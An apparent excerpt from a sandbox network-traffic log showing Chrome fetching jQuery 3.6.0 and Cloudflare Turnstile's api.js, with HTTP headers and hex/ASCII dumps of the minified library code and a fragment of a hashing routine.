                                                            2024-12-14 09:10:44 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                            Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.449772151.101.66.1374436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:43 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:44 UTC612INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Date: Sat, 14 Dec 2024 09:10:44 GMT
                                                            Age: 2688976
                                                            X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890024-NYC
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 55, 17
                                                            X-Timer: S1734167444.274139,VS0,VE0
                                                            Vary: Accept-Encoding
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                            2024-12-14 09:10:44 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.449773104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:45 UTC383OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:46 UTC471INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:45 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47692
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d10087bc61a38-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:46 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2024-12-14 09:10:46 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                            Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
